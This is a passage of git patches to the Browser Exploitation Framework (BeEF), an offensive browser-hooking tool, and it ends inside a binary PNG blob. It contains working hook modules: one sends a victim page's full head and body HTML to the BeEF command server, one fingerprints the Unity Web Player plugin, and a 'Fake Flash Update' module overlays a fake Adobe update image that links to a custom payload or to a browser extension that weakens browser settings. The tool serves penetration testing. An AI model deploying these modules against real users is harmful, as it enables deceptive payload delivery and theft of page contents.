diff --git a/modules/browser/hooked_domain/get_page_html/command.js b/modules/browser/hooked_domain/get_page_html/command.js
index b13096594..10540eb9d 100644
--- a/modules/browser/hooked_domain/get_page_html/command.js
+++ b/modules/browser/hooked_domain/get_page_html/command.js
@@ -6,18 +6,7 @@
 
 beef.execute(function() {
 
-	try {
-		var html_head = document.head.innerHTML.toString();
-	} catch (e) {
-		var html_head = "Error: document has no head";
-	}
-	try {
-		var html_body = document.body.innerHTML.toString();
-	} catch (e) {
-		var html_body = "Error: document has no body";
-	}
-
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+beef.browser.getPageHead()+'&body='+beef.browser.getPageBody());
 
 });
 

From d4c69f2bfd59417506d557abb405e06753a54f8c Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Tue, 15 Oct 2013 15:47:47 +0200
Subject: [PATCH 390/397] Module: Detect Unity Web Player

---
 modules/browser/detect_unity/command.js  | 60 ++++++++++++++++++++++++
 modules/browser/detect_unity/config.yaml | 15 ++++++
 modules/browser/detect_unity/module.rb   | 14 ++++++
 3 files changed, 89 insertions(+)
 create mode 100644 modules/browser/detect_unity/command.js
 create mode 100644 modules/browser/detect_unity/config.yaml
 create mode 100644 modules/browser/detect_unity/module.rb

diff --git a/modules/browser/detect_unity/command.js b/modules/browser/detect_unity/command.js
new file mode 100644
index 000000000..f1bd4316a
--- /dev/null
+++ b/modules/browser/detect_unity/command.js
@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	
+	var hasUnity = function() {
+		
+		// Internet Explorer
+		if ( beef.browser.isIE() ) {
+			
+			try {
+					var unity_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1');
+				} catch (e) { }
+				
+			if ( unity_test ) {
+				return true;
+			}
+		
+		// Not Internet Explorer	
+		} else if ( navigator.mimeTypes && navigator.mimeTypes["application/vnd.unity"] ) {
+			
+			if ( navigator.mimeTypes["application/vnd.unity"].enabledPlugin &&
+	            navigator.plugins &&
+				navigator.plugins["Unity Player"] ) {
+
+				return true;
+
+				}
+			
+		}
+		
+		return false;		
+	
+	}
+	
+	
+	
+	if ( hasUnity ) {
+		
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is enabled");
+		
+		if ( !beef.browser.isIE() ) {
+			
+			var unityRegex = /Unity Web Player version (.*). \(c\)/g;
+			var match = unityRegex.exec(navigator.plugins["Unity Player"].description);
+			
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity version = "+ match[1]);
+			
+		}
+		
+	} else {
+		
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is not enabled");
+	
+	}
+	
+});
\ No newline at end of file
diff --git a/modules/browser/detect_unity/config.yaml b/modules/browser/detect_unity/config.yaml
new file mode 100644
index 000000000..c3ae04811
--- /dev/null
+++ b/modules/browser/detect_unity/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Detect_unity:
+            enable: true
+            category: "Browser"
+            name: "Detect Unity Web Player"
+            description: "Detects Unity Web Player."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
diff --git a/modules/browser/detect_unity/module.rb b/modules/browser/detect_unity/module.rb
new file mode 100644
index 000000000..a1ea185dc
--- /dev/null
+++ b/modules/browser/detect_unity/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_unity < BeEF::Core::Command
+  
+  def post_execute
+    content = {}
+    content['unity'] = @datastore['unity']
+    save content
+  end
+
+end
\ No newline at end of file

From 41bfb8e995434c546453ce5fc8d0df5e447be543 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 17 Oct 2013 17:54:16 +1030
Subject: [PATCH 391/397] Fix bug with Unity Web Player detection

Fix issue #910
---
 modules/browser/detect_unity/command.js | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/browser/detect_unity/command.js b/modules/browser/detect_unity/command.js
index f1bd4316a..0fa9fc96f 100644
--- a/modules/browser/detect_unity/command.js
+++ b/modules/browser/detect_unity/command.js
@@ -38,7 +38,7 @@ beef.execute(function() {
 	
 	
 	
-	if ( hasUnity ) {
+	if ( hasUnity() ) {
 		
 		beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is enabled");
 		
@@ -57,4 +57,4 @@ beef.execute(function() {
 	
 	}
 	
-});
\ No newline at end of file
+});

From 9987f0781f3015803d93320b916f7edf0517bd3f Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Wed, 30 Oct 2013 17:05:01 +0100
Subject: [PATCH 392/397] Module Update: Fake Flash Update

Updated the prompted picture and part of the module.
---
 .../fake_flash_update/command.js              |  43 ++++++++++--------
 .../fake_flash_update/config.yaml             |   4 +-
 .../fake_flash_update/img/eng.png             | Bin 0 -> 77148 bytes
 .../fake_flash_update/img/ita.png             | Bin 0 -> 76853 bytes
 .../fake_flash_update/module.rb               |  37 +++++++++------
 5 files changed, 48 insertions(+), 36 deletions(-)
 mode change 100644 => 100755 modules/social_engineering/fake_flash_update/command.js
 mode change 100644 => 100755 modules/social_engineering/fake_flash_update/config.yaml
 create mode 100644 modules/social_engineering/fake_flash_update/img/eng.png
 create mode 100644 modules/social_engineering/fake_flash_update/img/ita.png
 mode change 100644 => 100755 modules/social_engineering/fake_flash_update/module.rb

diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
old mode 100644
new mode 100755
index 0cc853ad6..c408886f1
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -6,37 +6,40 @@
 
 beef.execute(function() {
   
-  	// Grab image and payload from config
-  	var image = "<%== @image %>";
-    var payload_type = "<%== @payload %>";
-    var payload_root =  "<%== @payload_root %>";
-    var chrome_store_uri = "<%== @chrome_store_uri %>";
-    var firefox_extension = "/api/ipec/ff_extension";
-    var payload = "";
+	// Module Configurations
+  	var image				= "<%== @image %>";
+    var payload_type		= "<%== @payload %>";
+    var payload_uri			= "<%== @payload_uri %>";
 
+    var beef_root			= beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port;
+    var payload				= "";
+
+	// Payload Configuration
     switch (payload_type) {
-        case "Chrome_Extension":
-            payload = chrome_store_uri;
-            break;
+        case "Custom_Payload":
+			payload = payload_uri;
+			break;
         case "Firefox_Extension":
-            payload = payload_root + firefox_extension;
+            payload = beef_root + "/api/ipec/ff_extension";
             break;
         default:
-            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=Error. No Payload selected.');
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');
             break;
     }
 
-  	// Add div to page
-    var div = document.createElement('div');
-	div.setAttribute('id', 'splash');
-	div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
-	div.setAttribute('align', 'center');
-	document.body.appendChild(div);
+  	// Create DIV
+    var fakediv = document.createElement('div');
+	fakediv.setAttribute('id', 'fakeDiv');
+	fakediv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');
+	fakediv.setAttribute('align', 'center');
+	document.body.appendChild(fakediv);
+	
 	// window.open is very useful when using data URI vectors and the IFrame/Object tag
 	// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
-    div.innerHTML= "<a href=\"javascript:window.open('" + payload + "')\"><img src=\"" + image + "\" /></a>";
+    fakediv.innerHTML = "<a href=\"" + payload + "\" target=\"_blank\" ><img src=\"" + image + "\" /></a>";
+
     $j("#splash").click(function () {
       $j(this).hide();
-        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=user has clicked');
     });
 });
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
old mode 100644
new mode 100755
index 8922b69dc..36841d3f0
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             category: "Social Engineering"
             name: "Fake Flash Update"
-            description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
-            authors: ["mh", "antisnatchor"]
+            description: "Prompts the user to install an update to <b>Adobe Flash Player</b>.<br />The delivered payload could be a custom file, a browser extension or any specific URI.<br /><br />The provided BeEF Firefox extension disables PortBanning (ports 20, 21, 22, 25, 110, 143), enables Java, overrides the UserAgent and the default home/new_tab pages.<br />See <i>/extensions/ipec/files/LinkTargetFinder</i> directory for the Firefox extension source code.<br /><br />The Chrome extension delivery works on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.<br />See <i>/extensions/demos/flash_update_chrome_extension/manifest.json</i> for more info and a sample extension that works on latest Chrome."
+            authors: ["mh", "antisnatchor", "gcattani"]
             target:
                 user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_flash_update/img/eng.png b/modules/social_engineering/fake_flash_update/img/eng.png
new file mode 100644
index 0000000000000000000000000000000000000000..0251d83e5b556cc47722b8135b7942b182d7d13d
GIT binary patch
literal 77148
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
